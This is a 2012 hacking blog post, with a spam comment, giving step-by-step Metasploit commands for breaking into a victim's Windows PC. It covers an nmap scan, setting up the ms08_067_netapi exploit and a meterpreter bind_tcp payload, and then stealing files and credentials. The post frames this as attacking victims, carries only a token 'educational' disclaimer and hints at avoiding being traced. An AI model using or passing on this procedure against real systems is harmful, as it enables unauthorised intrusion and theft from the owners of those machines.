Tuesday, 1 May 2012

How to hack a computer remotely using metasploit


Hey guys, today in this article I am going to talk about hacking a computer using metasploit. I think, I have already mentioned about metasploit in one of my article. Here I will give a general description on how it works and to use it efficiently to hack into a PC and steal credentials

But remember, this is only for educational purpose and hence damaging any victim’s computer is at your own risk.

Note: The hacker can be traceable and hence additional techniques are required to make yourself safe!

So here goes the requirements and the procedure to hack into a PC.

Requirements:

Metasploit (Available at metasploit.org)
Nmap (Port scanner available at nmap.org)
Debian  Linux OS (Learn more)
IP of the victim’s computer.
Introduction to attack:

Nmap is a port scanner used to scan a computer to locate the open ports. The ports are the path for the information that we need to steal. For a normal computer usually 30-40 ports are kept open.To find the number of ports open on your computer open command prompt (Start>Command prompt) and type netstat -ano and hit enter,  you will get a list of open ports in your computer. You need to have a basic knowledge on ports and port numbers to perform this attack.

Using a tool such as Metasploit we can spoof into the PC and steal the information from the corresponding port using commands. Learn to use Metasploit at http://www.metasploit.com/learn-more/how-do-i-use-it/.

We use Linux because it is the best OS for hackers. And you must know to use terminal on Linux, since we perform this attack on command lines.

Procedure:

Step 1: At first we are going to port scan the computer. For this we need to open Nmap and type the following command.

nmap -sS -O

In the place ofip> you have to write the victims ip address. If you see the ports 139 and 445 open then you can go ahead.

Step 2: Now we have to open Metasploit (via terminal) and run it.

Type the following command to get the exploits in the victim’s computer.

show exploits

You will get a list of exploits in the victim’s computer. which looks similar to ms05_039_pnp. Every such exploit correspond to different function. We are interested in an exploit which looks like this ms08_067_netapi. So we give a command as shown below.

use windows/smb/ms08_067_netapi

Step 3: Now we use RHOST command to set the target ip.

set RHOST

And RPORT command to access port 445

set RPORT 445

Step 4: And now we give a command as

set SMBPIPE SRVSVC

And then,

set TARGET 0

Step 5: Now we got to set the payload hence the following command.

set PAYLOAD windows/meterpreter/bind_tcp

Step 6: Time for the BIG BANG…! Type exploit and hit enter.

If you find the message which looks closer to “Meterpeter session 1 opened” then that implies you are done. You have successfully hacked  into the computer.

Now by using different commands we can steal the files on that system!

1 comments:

Harjinder said...

this post is awesome, great msg for us, plz update ur blog for daily basis, i am regular visitor of this site, so keep posting for us, if any want to get free backlink then click.

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Hack The Ass | Follow Us On Twitter | Facebook Hacker | How To Install Andorid 2.3 on Computer | BEST WEBHOSTING WEBSITES FOR FREE / FREE HOSTING